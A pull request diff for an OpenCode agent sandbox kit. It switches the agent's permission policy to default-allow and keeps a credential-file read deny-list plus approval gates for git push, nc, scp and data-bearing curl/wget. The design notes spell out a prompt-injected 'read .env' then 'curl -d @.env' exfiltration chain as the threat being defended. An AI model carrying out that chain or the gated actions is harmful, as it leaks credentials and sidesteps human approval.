### PR TITLE
feat(integrations): relax usai-provider permissions for sandbox use

### DIFF
--- a/integrations/isolation/sbx-kits/usai-provider-kit/README.md
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/README.md
@@ -23,6 +23,33 @@ on a non-OpenCode agent has no effect beyond the network allow-list.
   instead of prompting for a provider on startup.
 - **Co-tenancy guard** — a warn-only startup check (see
   [Co-tenancy](#co-tenancy)).
+- **Permissions** — a deliberately **default-allow** OpenCode permission policy
+  tuned for the sandbox (see [Permissions](#permissions)).
+
+## Permissions
+
+The shipped `opencode.jsonc` uses a **default-allow** permission policy. This is
+a deliberate deviation from a host-safe config, and it is safe **only because
+this kit runs exclusively inside an sbx sandbox**: an ephemeral container with no
+host filesystem access, a proxied/allow-listed network, and injected credentials
+(the container never holds real key material). That isolation is the security
+boundary; re-gating ordinary operations (`rm`, package installs, `sudo`, reading
+dotfiles, `env`/`printenv`, …) would only duplicate it and train users to approve
+prompts reflexively.
+
+The policy gates (`ask`) exactly one class of command: those that establish a
+**new outbound destination** for workspace contents, which the sandbox boundary
+does not fully contain — `git push`, `git remote add`/`set-url`, and
+`scp`/`sftp`/`rsync`/`nc`/`telnet`. Everything else, including `curl`/`wget`
+(egress is already bounded by the sandbox proxy allow-list) and secret-surfacing
+commands like `env`/`printenv`/`git remote -v` (which expose injected
+placeholders, not real secrets), is allowed.
+
+**Want a stricter posture?** Don't fork this kit. Compose a separate mixin that
+contributes `ask`/`deny` rules via a project-layer
+`<workspace>/.opencode/opencode.jsonc`, which OpenCode deep-merges *over* this
+config (OpenCode evaluates the last matching rule). See
+[`docs/decisions/relax-permissions-for-sandbox.md`](docs/decisions/relax-permissions-for-sandbox.md).
 
 ## Usage
 
@@ -108,6 +135,8 @@ See [`docs/decisions/`](docs/decisions/):
   — why a self-contained kit, namespaced `OPENCODE_CONFIG`, secret handling.
 - [`opencode-config-co-tenancy.md`](docs/decisions/opencode-config-co-tenancy.md)
   — single `OPENCODE_CONFIG` owner, the ownership marker, the fragment contract.
+- [`relax-permissions-for-sandbox.md`](docs/decisions/relax-permissions-for-sandbox.md)
+  — why the permission policy is default-allow, and how to re-gate via a mixin.
 
 ## Layout
 

--- a/integrations/isolation/sbx-kits/usai-provider-kit/README.md
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/README.md
@@ -24,7 +24,8 @@ on a non-OpenCode agent has no effect beyond the network allow-list.
 - **Co-tenancy guard** — a warn-only startup check (see
   [Co-tenancy](#co-tenancy)).
 - **Permissions** — a deliberately **default-allow** OpenCode permission policy
-  tuned for the sandbox (see [Permissions](#permissions)).
+  tuned for the sandbox, keeping only a zero-prompt `read` credential deny-list
+  (see [Permissions](#permissions)).
 
 ## Permissions
 
@@ -33,22 +34,41 @@ a deliberate deviation from a host-safe config, and it is safe **only because
 this kit runs exclusively inside an sbx sandbox**: an ephemeral container with no
 host filesystem access, a proxied/allow-listed network, and injected credentials
 (the container never holds real key material). That isolation is the security
-boundary; re-gating ordinary operations (`rm`, package installs, `sudo`, reading
-dotfiles, `env`/`printenv`, …) would only duplicate it and train users to approve
-prompts reflexively.
+boundary; re-gating ordinary operations (`rm`, package installs, `sudo`,
+`env`/`printenv`, …) would only duplicate it and train users to approve prompts
+reflexively.
 
-The policy gates (`ask`) exactly one class of command: those that establish a
-**new outbound destination** for workspace contents, which the sandbox boundary
-does not fully contain — `git push`, `git remote add`/`set-url`, and
-`scp`/`sftp`/`rsync`/`nc`/`telnet`. Everything else, including `curl`/`wget`
-(egress is already bounded by the sandbox proxy allow-list) and secret-surfacing
+The policy gates (`ask`):
+
+- **New-outbound-destination commands** — `git push`, `git remote add`/`set-url`,
+  `gh pr create`/`gh api`, and `scp`/`sftp`/`rsync`/`nc`/`telnet`. This is a
+  human-in-the-loop *affordance* for the highest-consequence "push my workspace
+  somewhere named" actions, **not** an exhaustive egress firewall — the sandbox
+  proxy allow-list is the real network control, so `aws s3 cp`/`gcloud`/`az`/
+  `docker push`/`dig` are intentionally left ungated (same proxy boundary; see
+  the decision record).
+- **Data-bearing `curl`/`wget`** (`-d`/`--data`/`-F`/`-T`/`-X POST`, wget
+  `--post-*`/`--body-*`) — as **defense-in-depth**, not a completeness claim.
+
+It also keeps one hard **`deny`**: the `read` tool's **credential-file
+deny-list** (`.env`, `*.pem`, `*.key`, `*.tfvars`, `~/.aws/*`, kubeconfig, …).
+This costs zero prompts (reading credentials is never the agent's job) and is the
+one control the proxy allow-list can't provide — it breaks a prompt-injected
+`read .env` → `curl -d @.env <allowed-host>` chain at the read step. It governs
+the **read tool** only (not `bash`, so `cat .env` isn't blocked), so it is
+belt-and-suspenders, not a complete exfil block.
+
+Everything else — including benign `curl`/`wget` reads and secret-surfacing
 commands like `env`/`printenv`/`git remote -v` (which expose injected
-placeholders, not real secrets), is allowed.
+placeholders, not real secrets) — is allowed. `bash` has **no** hard-deny rules;
+the sandbox, not a bash denylist, is the control there.
 
 **Want a stricter posture?** Don't fork this kit. Compose a separate mixin that
 contributes `ask`/`deny` rules via a project-layer
 `<workspace>/.opencode/opencode.jsonc`, which OpenCode deep-merges *over* this
-config (OpenCode evaluates the last matching rule). See
+config (OpenCode evaluates the **last matching** rule, so a later fragment wins —
+which is also why this config orders every `ask` edge after the broad `allow`).
+See
 [`docs/decisions/relax-permissions-for-sandbox.md`](docs/decisions/relax-permissions-for-sandbox.md).
 
 ## Usage

--- a/integrations/isolation/sbx-kits/usai-provider-kit/docs/decisions/relax-permissions-for-sandbox.md
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/docs/decisions/relax-permissions-for-sandbox.md
@@ -1,0 +1,98 @@
+# Decision: default-allow OpenCode permissions, tuned for the sandbox
+
+**Status:** accepted
+
+## Context
+
+The `usai-provider` kit ships an `opencode.jsonc` that includes OpenCode's
+`permission` policy. The original policy was a hardened, **default-deny/ask**
+config: it denied reading credential files (`.env`, `*.pem`, `~/.aws/*`, …),
+gated `git`, package managers, and builds behind `ask`, and hard-denied `sudo`,
+`ssh`, `nc`, `rm`, `dd`, and dozens more. That policy was written for an
+**untrusted-host** threat model — an agent that shares a filesystem and network
+with the user's real machine and real secrets.
+
+This kit does not run in that model. It runs **exclusively inside an sbx
+sandbox**:
+
+- an ephemeral container with **no access to the host filesystem**;
+- a **proxied, allow-listed network** (egress is constrained by sbx, not by the
+  agent's shell);
+- **injected credentials** — the container never holds real key material; env
+  values are placeholders or proxied.
+
+In that setting, most of the original gates re-implement — weakly — protections
+the sandbox already provides, at the cost of constant `ask` prompts. That
+friction has its own security cost: it trains users to approve prompts
+reflexively, which erodes the value of the one prompt that actually matters.
+
+## Decision
+
+Adopt a **default-allow** permission policy, gating only the class of action the
+sandbox boundary does **not** fully contain.
+
+- Top-level default `"*": "allow"`; `edit`, `read`, `webfetch`, `websearch`
+  allow. The former `read` credential-file deny-list is **removed** entirely.
+- `bash` default `"*": "allow"`.
+- `bash` gates (`ask`) **only outbound "new destination" commands**, which could
+  push workspace contents somewhere a prompt-injected agent chose:
+  `git push`, `git remote add`, `git remote set-url`, and
+  `scp`/`sftp`/`rsync`/`nc`/`ncat`/`netcat`/`telnet`.
+- **No hard `deny` rules.** The sandbox, not a denylist, is the control.
+
+### What is deliberately allowed (and why it's safe here)
+
+- **Destructive/filesystem/privilege ops** (`rm -rf`, `dd`, `chmod`, `sudo`,
+  `systemctl`, …): blast radius is one ephemeral container. `rm -rf` in a
+  throwaway box is a self-own, not a breach.
+- **Reading dotfiles / "secret" files** (`.env`, `*.pem`, `~/.aws`, kubeconfig):
+  the workspace is expected to be a clone or worktree the user chose to mount —
+  it should not contain real secrets — and real credentials are injected, not
+  on disk. Reading project files is the agent's job.
+- **Package installs / builds / tests** (`npm`, `uv`, `pytest`, `make`,
+  `cargo`, `docker`): the entire point of a coding agent. Supply-chain risk is
+  bounded by the sandbox + egress allow-list, not by an `ask` prompt.
+- **`curl`/`wget`**: allowed. A glob allowlist cannot reliably tell a benign
+  `GET` from an exfiltrating `POST` (`-d`, `-T`, `-F`, `-X`, or data smuggled in
+  a GET URL, in any flag order), so pretending it's an egress firewall would be
+  false confidence. The **proxy allow-list** is the real network control; the
+  human sees the full command only where a *new channel* is opened (the `ask`
+  edges above).
+- **Secret-surfacing commands** (`env`, `printenv`, `git remote -v`,
+  `git config --get`): allowed. In the sandbox these expose injected
+  placeholders / proxied values, not real secret material — inspecting them is
+  expected, not a leak. (This matches the sandbox's credential-injection design.)
+
+### Residual risk (accepted)
+
+A novel outbound command not in the `ask` list runs unprompted. This is bounded
+by the sandbox's proxy egress allow-list (an unknown host is not reachable), and
+the highest-consequence known outbound action (`git push`) is gated. Accepted at
+FIPS-Low for a development sandbox.
+
+## Re-gating for stricter environments
+
+This kit's default is intentionally sandbox-appropriate, not a
+one-size-fits-all host-safe policy. Operators who want tighter controls should
+**not fork this kit**. Instead, compose a **separate mixin** that contributes
+`ask`/`deny` rules via a project-layer `<workspace>/.opencode/opencode.jsonc`.
+OpenCode deep-merges that fragment *over* this kit's `OPENCODE_CONFIG`, and
+evaluates the **last matching** permission rule, so a re-gating fragment that
+loads after this config wins. (See the companion co-tenancy decision record for
+the merge/precedence contract.) This keeps the permissive default and the strict
+overlay as independent, composable pieces.
+
+## Consequences
+
+- Far fewer approval prompts for routine, sandbox-contained work; the prompts
+  that remain (`git push`, new remotes/channels) are the ones worth a human's
+  attention.
+- The policy is honest about what it is: sandbox-tuned, documented as such in the
+  README, and not to be lifted into a non-sandboxed context unchanged.
+- Encoded in `tests/opencode-permissions.test.mjs`, which asserts the
+  default-allow posture, the specific `ask` edges, and that nothing is hard-denied.
+
+## Links
+
+- Companion: `opencode-config-co-tenancy.md` (the merge/precedence contract a
+  re-gating mixin relies on)

--- a/integrations/isolation/sbx-kits/usai-provider-kit/docs/decisions/relax-permissions-for-sandbox.md
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/docs/decisions/relax-permissions-for-sandbox.md
@@ -24,51 +24,118 @@ sandbox**:
 In that setting, most of the original gates re-implement — weakly — protections
 the sandbox already provides, at the cost of constant `ask` prompts. That
 friction has its own security cost: it trains users to approve prompts
-reflexively, which erodes the value of the one prompt that actually matters.
+reflexively, which erodes the value of the one prompt that actually matters. The
+exception is the `read` credential-file deny-list: it is a hard `deny` that costs
+zero prompts and defends a gap the sandbox does *not* cover (see the Decision),
+so we keep it.
 
 ## Decision
 
 Adopt a **default-allow** permission policy, gating only the class of action the
-sandbox boundary does **not** fully contain.
+sandbox boundary does **not** fully contain, while keeping one cheap,
+zero-prompt data-exfil control (the `read` credential deny-list).
 
-- Top-level default `"*": "allow"`; `edit`, `read`, `webfetch`, `websearch`
-  allow. The former `read` credential-file deny-list is **removed** entirely.
+- Top-level default `"*": "allow"`; `edit`, `webfetch`, `websearch` allow.
+- The `read` tool keeps its **hard-`deny` credential-file list** (`.env`,
+  `*.pem`, `*.key`, `*.tfvars`, `~/.aws/*`, kubeconfig, `.npmrc`,
+  `.git-credentials`, …). This is the one deny we keep, because it costs **zero
+  prompts** (deny, not ask — reading credentials is never the agent's job) and it
+  is the only thing that breaks a prompt-injected `read .env` →
+  `curl -d @.env <allowed-host>` chain, which the proxy allow-list *cannot* stop
+  (see "Why keep the read-deny" below). Example files (`.env.example`, …) are
+  allowed and ordered **last** so they win.
 - `bash` default `"*": "allow"`.
-- `bash` gates (`ask`) **only outbound "new destination" commands**, which could
+- `bash` gates (`ask`) the outbound **"new destination"** commands that could
   push workspace contents somewhere a prompt-injected agent chose:
-  `git push`, `git remote add`, `git remote set-url`, and
-  `scp`/`sftp`/`rsync`/`nc`/`ncat`/`netcat`/`telnet`.
-- **No hard `deny` rules.** The sandbox, not a denylist, is the control.
+  `git push`, `git remote add`, `git remote set-url`, `gh pr create`, `gh api`,
+  and `scp`/`sftp`/`rsync`/`nc`/`ncat`/`netcat`/`telnet`.
+- `bash` also gates (`ask`) the **data-bearing forms** of `curl`/`wget`
+  (`-d`/`--data`/`-F`/`--form`/`-T`/`--upload-file`/`-X POST|PUT`, and wget's
+  `--post-data`/`--post-file`/`--body-*`) as **defense-in-depth** — explicitly
+  *not* a claim of completeness (see below).
+- **No hard `deny` rules in `bash`.** The sandbox, not a bash denylist, is the
+  control for command execution; the only `deny` in the whole policy is the
+  `read` credential list, which governs the read *tool*, not shell commands.
+
+### The "new outbound destination" gate is a UX affordance, not a firewall
+
+We deliberately do **not** try to enumerate every command that can send bytes
+off-box. Egress is already bounded by the **sandbox proxy allow-list** — an
+unknown host is simply unreachable, regardless of which binary tries. Playing
+whack-a-mole with an `ask` list for every possible network tool would be endless
+and would train reflexive approval, buying no real security over the proxy.
+
+So the `ask` edges exist only as a **human-in-the-loop affordance for the
+highest-frequency, highest-consequence "push my workspace to a *named* new
+destination" actions** — `git push`/`gh` (the ones an agent reaches for
+constantly) plus the classic copy/reverse-shell tools (`scp`/`rsync`/`nc`/…).
+
+The following are **intentionally NOT gated** — they ride the *same* proxy
+egress boundary, so gating them adds prompts without adding containment:
+
+| Not gated | Why it's already contained |
+|-----------|----------------------------|
+| `aws s3 cp` / `aws s3 sync` | Destination host must be on the proxy allow-list. |
+| `gcloud storage cp`, `gsutil cp` | Same — bounded by the proxy allow-list. |
+| `az storage blob upload` | Same. |
+| `docker push` / `podman push` | Registry host must be allow-listed; images are workspace-derived, not secret-material. |
+| `dig` / `nslookup` | DNS is a possible covert channel, but the proxy/resolver bounds it; a per-command prompt is theater. |
+
+If a deployment needs any of these gated, that is exactly what the re-gating
+mixin (below) is for — it can add them without forking this kit.
+
+### Why keep the read-deny (the one exception to "no deny")
+
+The workspace *should* be a clone/worktree the user chose to mount, without real
+secrets — but a user may realistically mount a repo that carries a real
+`.env`/`*.pem`/`*.tfvars`. If the agent is prompt-injected, `read .env` →
+`curl -d @.env https://api.gsa.usai.gov` exfiltrates to a host that is **on the
+allow-list and accepts POST bodies**. The proxy allow-list — the only network
+control — cannot distinguish that malicious POST from legitimate model traffic.
+A hard `deny` on reading credential files cuts that chain at the source for free.
+
+Scope note (honest about what it is): the read-deny governs the **read tool**,
+not `bash`. `cat .env` in a shell is *not* blocked. It is therefore
+**belt-and-suspenders**, not a complete exfil block — the data-bearing
+curl/wget gates and the proxy allow-list are the other layers.
 
 ### What is deliberately allowed (and why it's safe here)
 
 - **Destructive/filesystem/privilege ops** (`rm -rf`, `dd`, `chmod`, `sudo`,
   `systemctl`, …): blast radius is one ephemeral container. `rm -rf` in a
   throwaway box is a self-own, not a breach.
-- **Reading dotfiles / "secret" files** (`.env`, `*.pem`, `~/.aws`, kubeconfig):
-  the workspace is expected to be a clone or worktree the user chose to mount —
-  it should not contain real secrets — and real credentials are injected, not
-  on disk. Reading project files is the agent's job.
+- **`cat`/`less` of dotfiles / "secret" files**: allowed in `bash` (the read
+  *tool* deny-list does not cover shell commands). Real credentials are injected,
+  not on disk; the read-deny is a cheap extra layer, not a promise.
 - **Package installs / builds / tests** (`npm`, `uv`, `pytest`, `make`,
   `cargo`, `docker`): the entire point of a coding agent. Supply-chain risk is
   bounded by the sandbox + egress allow-list, not by an `ask` prompt.
-- **`curl`/`wget`**: allowed. A glob allowlist cannot reliably tell a benign
-  `GET` from an exfiltrating `POST` (`-d`, `-T`, `-F`, `-X`, or data smuggled in
-  a GET URL, in any flag order), so pretending it's an egress firewall would be
-  false confidence. The **proxy allow-list** is the real network control; the
-  human sees the full command only where a *new channel* is opened (the `ask`
-  edges above).
+- **Benign `curl`/`wget` reads** (`GET`, no data flags): allowed. A glob cannot
+  reliably tell a benign `GET` from an exfiltrating `POST` in every case (flag
+  order, data smuggled in a GET URL, encodings), so the data-flag gates are
+  **defense-in-depth, not an egress firewall** — the **proxy allow-list** is the
+  real network control.
 - **Secret-surfacing commands** (`env`, `printenv`, `git remote -v`,
   `git config --get`): allowed. In the sandbox these expose injected
   placeholders / proxied values, not real secret material — inspecting them is
   expected, not a leak. (This matches the sandbox's credential-injection design.)
 
+### Relationship to least-privilege (`least-privilege-review`, AC-6)
+
+This pack also ships deny-by-default review skills (`least-privilege-review`,
+`secure-code-review`) and the playbook preaches AC-6. That is not a
+contradiction: **least-privilege here is enforced by the sbx boundary (no host
+FS, proxied egress, injected creds), not by the permission map** — and the
+deny-by-default review skills apply to the *code being reviewed*, not to this
+sandbox's own shell. The permission map is deliberately permissive *because* a
+stronger control (the sandbox) sits underneath it.
+
 ### Residual risk (accepted)
 
 A novel outbound command not in the `ask` list runs unprompted. This is bounded
 by the sandbox's proxy egress allow-list (an unknown host is not reachable), and
-the highest-consequence known outbound action (`git push`) is gated. Accepted at
-FIPS-Low for a development sandbox.
+the highest-consequence known outbound actions (`git push`/`gh`) are gated.
+Accepted at FIPS-Low for a development sandbox.
 
 ## Re-gating for stricter environments
 
@@ -77,20 +144,29 @@ one-size-fits-all host-safe policy. Operators who want tighter controls should
 **not fork this kit**. Instead, compose a **separate mixin** that contributes
 `ask`/`deny` rules via a project-layer `<workspace>/.opencode/opencode.jsonc`.
 OpenCode deep-merges that fragment *over* this kit's `OPENCODE_CONFIG`, and
-evaluates the **last matching** permission rule, so a re-gating fragment that
-loads after this config wins. (See the companion co-tenancy decision record for
-the merge/precedence contract.) This keeps the permissive default and the strict
+evaluates the **last matching** permission rule (OpenCode's `evaluate` uses
+`findLast` over the flattened rule list — see
+`packages/opencode/src/permission`), so a re-gating fragment that loads after
+this config wins. This is also why the shipped config places every `ask` edge
+*after* the broad `"*": "allow"` — under last-matching-rule, order is
+load-bearing. (See the companion co-tenancy decision record for the
+merge/precedence contract.) This keeps the permissive default and the strict
 overlay as independent, composable pieces.
 
 ## Consequences
 
 - Far fewer approval prompts for routine, sandbox-contained work; the prompts
-  that remain (`git push`, new remotes/channels) are the ones worth a human's
-  attention.
+  that remain (`git push`/`gh`, new remotes/channels, data-bearing curl/wget)
+  are the ones worth a human's attention.
 - The policy is honest about what it is: sandbox-tuned, documented as such in the
   README, and not to be lifted into a non-sandboxed context unchanged.
-- Encoded in `tests/opencode-permissions.test.mjs`, which asserts the
-  default-allow posture, the specific `ask` edges, and that nothing is hard-denied.
+- Encoded in `tests/opencode-permissions.test.mjs`, which models OpenCode's
+  **last-matching-rule** semantics (not most-specific-wins) and asserts the
+  default-allow posture, the specific `ask` edges (including `gh` and the
+  data-bearing curl/wget forms), the retained `read` credential deny-list, and
+  that **`bash`** has no hard-deny rules. It includes a regression test proving a
+  trailing broad `allow` reopens a gate — the failure mode that a
+  most-specific-wins resolver would have hidden.
 
 ## Links
 

--- a/integrations/isolation/sbx-kits/usai-provider-kit/files/home/usai-config/opencode.jsonc
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/files/home/usai-config/opencode.jsonc
@@ -264,12 +264,25 @@
     // duplicate protections the sandbox already provides and train users to
     // approve prompts reflexively — so the default is "allow".
     //
-    // We gate (ask) only the ONE class the sandbox does not fully contain:
-    // commands that establish a NEW outbound destination for workspace
-    // contents, where a prompt-injected agent could exfiltrate. Network egress
-    // is already bounded by the sandbox proxy allow-list, so curl/wget/etc. are
-    // allowed; the human-in-the-loop gate is reserved for git push, new git
-    // remotes, and scp/sftp/rsync/nc/telnet.
+    // We gate (ask) the class the sandbox does not fully contain: commands that
+    // establish a NEW outbound destination for workspace contents, where a
+    // prompt-injected agent could exfiltrate. Network egress is already bounded
+    // by the sandbox proxy allow-list, so curl/wget are allowed for reads; the
+    // human-in-the-loop gate is reserved for git push, new git remotes, gh
+    // pr-create/api, scp/sftp/rsync/nc/telnet, and the DATA-bearing forms of
+    // curl/wget (defense-in-depth — see below). The ask list is NOT an exhaustive
+    // egress firewall (a glob cannot enumerate every exfil channel); the proxy
+    // allow-list is the real control, and the ask edges are a UX affordance for
+    // the highest-frequency, highest-consequence "new destination" actions.
+    //
+    // The read tool keeps a hard-DENY credential-file list (.env, *.pem,
+    // ~/.aws/*, kubeconfig, ...). This costs ZERO prompts (reading credentials is
+    // never the agent's job) and is the load-bearing control against a
+    // prompt-injected `read .env` -> exfil chain, since the proxy allow-list
+    // cannot distinguish benign from malicious POST bodies to an allowed host.
+    // Note: this governs the read TOOL only; bash stays default-allow (so
+    // `cat .env` is not blocked) — the deny-list is belt-and-suspenders, not a
+    // complete exfil block.
     //
     // SECRET-SURFACING commands (env, printenv, git remote -v, git config --get)
     // are deliberately ALLOWED. In the sandbox these expose injected
@@ -285,21 +298,83 @@
     // -------------------------------------------------------------------------
     "*": "allow",
     "edit": "allow",
-    "read": "allow",
+    // The read tool keeps a hard-DENY credential-file list even under the
+    // otherwise default-allow posture. Rationale: it costs ZERO prompts (deny,
+    // not ask) and is the one control the proxy allow-list cannot provide — it
+    // breaks a prompt-injected `read .env` -> `curl -d @.env <allowed-host>`
+    // chain at the read step. The workspace SHOULD be a clone/worktree without
+    // real secrets, but a user may mount a repo that carries a real .env/*.pem/
+    // *.tfvars, so we keep the belt-and-suspenders. Example files are allowed
+    // LAST so they win (OpenCode evaluates the last matching rule).
+    "read": {
+      "*": "allow",
+      // Deny sensitive credential files
+      ".env": "deny",
+      ".env.*": "deny",
+      "*.env": "deny",
+      "*.env.*": "deny",
+      // Deny cryptographic key files
+      "*.pem": "deny",
+      "*.key": "deny",
+      "*.p12": "deny",
+      "*.pfx": "deny",
+      // Deny SSH keys
+      "*id_rsa*": "deny",
+      "*id_ed25519*": "deny",
+      // Deny Terraform variable files (may contain secrets)
+      "*.tfvars": "deny",
+      "*.tfvars.json": "deny",
+      // Cloud provider credentials
+      "**/.aws/*": "deny",
+      "**/.gcloud/*": "deny",
+      "**/.azure/*": "deny",
+      "**/application_default_credentials.json": "deny",
+      "*_accessKeys.csv": "deny",
+      // Kubernetes
+      "**/kubeconfig*": "deny",
+      "**/.kube/*": "deny",
+      // Package manager credentials
+      "**/.npmrc": "deny",
+      "**/.pypirc": "deny",
+      "**/pip.conf": "deny",
+      "**/.docker/config.json": "deny",
+      // HashiCorp
+      "**/.vault-token": "deny",
+      "**/*.hclic": "deny",
+      // Git credentials
+      "**/.git-credentials": "deny",
+      "**/.netrc": "deny",
+      // Ansible vaults (may contain encrypted secrets)
+      "*vault*.yml": "deny",
+      "*vault*.yaml": "deny",
+      // Generic sensitive directories
+      "**/secrets/**": "deny",
+      "**/credentials/**": "deny",
+      "**/.secrets/**": "deny",
+      // Allow example files (documentation purposes) - must come last
+      ".env.example": "allow",
+      "*.env.example": "allow",
+      "*.tfvars.example": "allow"
+    },
     "webfetch": "allow",
     "websearch": "allow",
     "bash": {
       "*": "allow",
 
       // Outbound "new destination" edges — gated (ask) because they can push
-      // workspace contents somewhere the proxy allow-list may permit. These are
-      // the only commands the sandbox boundary does not fully contain. Listed
+      // workspace contents somewhere the proxy allow-list may permit. Listed
       // after the "*" allow so they win (OpenCode uses the last matching rule);
-      // both the bare word and the "* args" form are covered.
+      // both the bare word and the "* args" form are covered. This is a UX
+      // affordance for the highest-consequence channels, NOT an exhaustive
+      // egress firewall — see the header comment and the decision record.
       "git push": "ask",
       "git push *": "ask",
       "git remote add *": "ask",
       "git remote set-url *": "ask",
+      // gh is a first-class "new named outbound destination" sibling of git push
+      // (it POSTs workspace contents to GitHub). Gated for the same reason.
+      "gh pr create*": "ask",
+      "gh api*": "ask",
       "scp": "ask",
       "scp *": "ask",
       "sftp": "ask",
@@ -313,7 +388,30 @@
       "netcat": "ask",
       "netcat *": "ask",
       "telnet": "ask",
-      "telnet *": "ask"
+      "telnet *": "ask",
+
+      // DATA-bearing curl/wget forms — gated as DEFENSE-IN-DEPTH, not a firewall.
+      // A glob cannot reliably catch every exfil form (flag order, data smuggled
+      // in a GET URL, encodings), so this is not a completeness claim; the proxy
+      // allow-list remains the real egress control. Pairs with the read-deny to
+      // raise the bar on the obvious `curl -d @secret` / upload paths. Ordered
+      // last so they win over the "*" allow. Both `curl -d ...` (flag first) and
+      // `curl <url> -d ...` (flag later) forms are covered via `*-d*` / `* -d*`.
+      "curl *-d*": "ask",
+      "curl *--data*": "ask",
+      "curl *-F*": "ask",
+      "curl *--form*": "ask",
+      "curl *-T*": "ask",
+      "curl *--upload-file*": "ask",
+      "curl *-X POST*": "ask",
+      "curl *-X PUT*": "ask",
+      "curl *--request POST*": "ask",
+      "curl *--request PUT*": "ask",
+      "wget *--post-data*": "ask",
+      "wget *--post-file*": "ask",
+      "wget *--method=POST*": "ask",
+      "wget *--body-data*": "ask",
+      "wget *--body-file*": "ask"
     }
   },
   // ===========================================================================

--- a/integrations/isolation/sbx-kits/usai-provider-kit/files/home/usai-config/opencode.jsonc
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/files/home/usai-config/opencode.jsonc
@@ -7,15 +7,19 @@
   // government developers using the USAi LiteLLM gateway.
   //
   // STRUCTURE:
-  //   Lines 1-400:   Active configuration (functional settings)
-  //   Lines 400+:    Reference examples (all commented out)
+  //   Active configuration (functional settings), then commented reference
+  //   examples further down.
   //
   // Documentation: https://opencode.ai/docs/config/
   // Schema:        https://opencode.ai/config.json
   //
-  // SECURITY NOTICE: This config follows FIPS Low baseline (pilot scope).
-  // For FIPS Moderate environments, review and tighten permissions further.
-  // See agentic-coding-playbook for FIPS Moderate guidance.
+  // SECURITY NOTICE: The permission policy below is DEFAULT-ALLOW, tuned for use
+  // INSIDE an sbx sandbox (ephemeral container, no host FS, proxied/allow-listed
+  // network, injected credentials). It is NOT a host-safe policy. It gates only
+  // outbound "new destination" commands (git push, new remotes, scp/sftp/etc.).
+  // For stricter environments, layer a separate mixin that re-gates via a
+  // project-layer .opencode/opencode.jsonc rather than editing this file. See
+  // docs/decisions/relax-permissions-for-sandbox.md.
   // ===========================================================================
   "$schema": "https://opencode.ai/config.json",
 
@@ -249,260 +253,67 @@
   // PERMISSIONS
   // ===========================================================================
   "permission": {
-    "*": "ask",
-    "read": {
-      "*": "allow",
-      // Deny sensitive credential files
-      ".env": "deny",
-      ".env.*": "deny",
-      "*.env": "deny",
-      "*.env.*": "deny",
-      // Deny cryptographic key files
-      "*.pem": "deny",
-      "*.key": "deny",
-      "*.p12": "deny",
-      "*.pfx": "deny",
-      // Deny SSH keys
-      "*id_rsa*": "deny",
-      "*id_ed25519*": "deny",
-      // Deny Terraform variable files (may contain secrets)
-      "*.tfvars": "deny",
-      "*.tfvars.json": "deny",
-      // Cloud provider credentials
-      "**/.aws/*": "deny",
-      "**/.gcloud/*": "deny",
-      "**/.azure/*": "deny",
-      "**/application_default_credentials.json": "deny",
-      "*_accessKeys.csv": "deny",
-      // Kubernetes
-      "**/kubeconfig*": "deny",
-      "**/.kube/*": "deny",
-      // Package manager credentials
-      "**/.npmrc": "deny",
-      "**/.pypirc": "deny",
-      "**/pip.conf": "deny",
-      "**/.docker/config.json": "deny",
-      // HashiCorp
-      "**/.vault-token": "deny",
-      "**/*.hclic": "deny",
-      // Git credentials
-      "**/.git-credentials": "deny",
-      "**/.netrc": "deny",
-      // Ansible vaults (may contain encrypted secrets)
-      "*vault*.yml": "deny",
-      "*vault*.yaml": "deny",
-      // Generic sensitive directories
-      "**/secrets/**": "deny",
-      "**/credentials/**": "deny",
-      "**/.secrets/**": "deny",
-      // Allow example files (documentation purposes) - must come last
-      ".env.example": "allow",
-      "*.env.example": "allow",
-      "*.tfvars.example": "allow"
-    },
-    "edit": "ask",
-    "glob": "allow",
-    "grep": "allow",
-    "list": "allow",
-    "lsp": "allow",
-    "todowrite": "allow",
-    "question": "allow",
-    "skill": "ask",
-    "task": "ask",
-    "webfetch": "ask",
+    // -------------------------------------------------------------------------
+    // SANDBOX-TUNED, DEFAULT-ALLOW POLICY
+    //
+    // This kit is used ONLY inside an sbx sandbox: an ephemeral container with
+    // no access to the host filesystem, a proxied/allow-listed network, and
+    // INJECTED credentials (the container never holds real key material). That
+    // isolation is the security boundary. Re-gating ordinary operations here
+    // (rm, package installs, sudo, reading dotfiles, env/printenv, ...) would
+    // duplicate protections the sandbox already provides and train users to
+    // approve prompts reflexively — so the default is "allow".
+    //
+    // We gate (ask) only the ONE class the sandbox does not fully contain:
+    // commands that establish a NEW outbound destination for workspace
+    // contents, where a prompt-injected agent could exfiltrate. Network egress
+    // is already bounded by the sandbox proxy allow-list, so curl/wget/etc. are
+    // allowed; the human-in-the-loop gate is reserved for git push, new git
+    // remotes, and scp/sftp/rsync/nc/telnet.
+    //
+    // SECRET-SURFACING commands (env, printenv, git remote -v, git config --get)
+    // are deliberately ALLOWED. In the sandbox these expose injected
+    // placeholders / proxied values, not real secrets — inspecting them is
+    // expected, not a leak. Credential injection is the whole point.
+    //
+    // Want a stricter posture? Do NOT fork this kit. Compose a separate mixin
+    // that contributes ask/deny rules via a project-layer
+    // <workspace>/.opencode/opencode.jsonc, which OpenCode deep-merges OVER this
+    // config. OpenCode evaluates the LAST matching rule, so a re-gating fragment
+    // that loads after this one wins. See
+    // docs/decisions/relax-permissions-for-sandbox.md.
+    // -------------------------------------------------------------------------
+    "*": "allow",
+    "edit": "allow",
+    "read": "allow",
+    "webfetch": "allow",
     "websearch": "allow",
-    "external_directory": "ask",
-    "doom_loop": "ask",
     "bash": {
-      "*": "ask",
-      "pwd": "allow",
-      "ls": "allow",
-      "ls *": "allow",
-      "tree": "allow",
-      "tree *": "allow",
-      "rg": "allow",
-      "rg *": "allow",
-      "grep": "allow",
-      "grep *": "allow",
-      // ---------------------------------------------------------------------
-      // Read-only filesystem traversal. `find` is allowed for inspection,
-      // but the mutating / command-executing forms are denied first so they
-      // win over the broad allow (issue #177).
-      // ---------------------------------------------------------------------
-      "find * -exec*": "deny",
-      "find * -execdir*": "deny",
-      "find * -delete*": "deny",
-      "find * -fprintf*": "deny",
-      "find * -fls*": "deny",
-      "find * -ok*": "deny",
-      "find * -okdir*": "deny",
-      "find": "allow",
-      "find *": "allow",
-      // ---------------------------------------------------------------------
